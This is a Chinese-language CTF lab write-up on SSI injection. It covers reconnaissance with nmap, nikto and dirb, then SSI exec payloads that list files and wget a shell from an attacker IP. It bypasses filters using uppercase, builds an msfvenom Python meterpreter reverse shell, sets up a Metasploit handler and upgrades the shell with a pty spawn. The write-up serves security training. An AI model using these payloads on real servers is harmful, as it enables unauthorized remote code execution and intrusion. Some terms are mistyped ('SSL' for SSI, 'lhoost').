CTF实验:SSI注入
SSI注入攻击介绍
SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。
如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。
信息探测
扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
dirb HTTP://IP:端口
只开了http服务
找到敏感页面,打开
将文件下载下来
可以查看文件的内容
可能是提示记下来
漏洞利用
根据提示来利用对应SSL注入漏洞
列举当前目录中的文件和目录
《!–#exec cmd=“ls” -->
切换到指定目录
《!–#exec cmd=“cd /root/dir/”>
下载shell脚本 并重命名为shell.php
《!–#exec cmd=“wget http://ip/shell.txt | rename shell.txt shell.php” -->
尝试输入一些命令
返回结果
可以看到Target里<被注释了,Feedback里exec被注释了,将其改为大写再试试,成功了
制作webshell
msfvenom -p python/meterpreter/reverse_tcp lhoost=ip lport=4444 -f raw > shell.py
启动msfconsole
设置参数
msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
上传shell反弹shell
要shell.py 放在var/www/html 里 并开启apache2服务
准被上传
成功进入
sysinfo 查看系统信息
shell 进入系统shell
优化终端 python –c ‘import pty;pty.spawn(“/bin/bash”)’
总结
在CTF比赛中,对于SSI漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;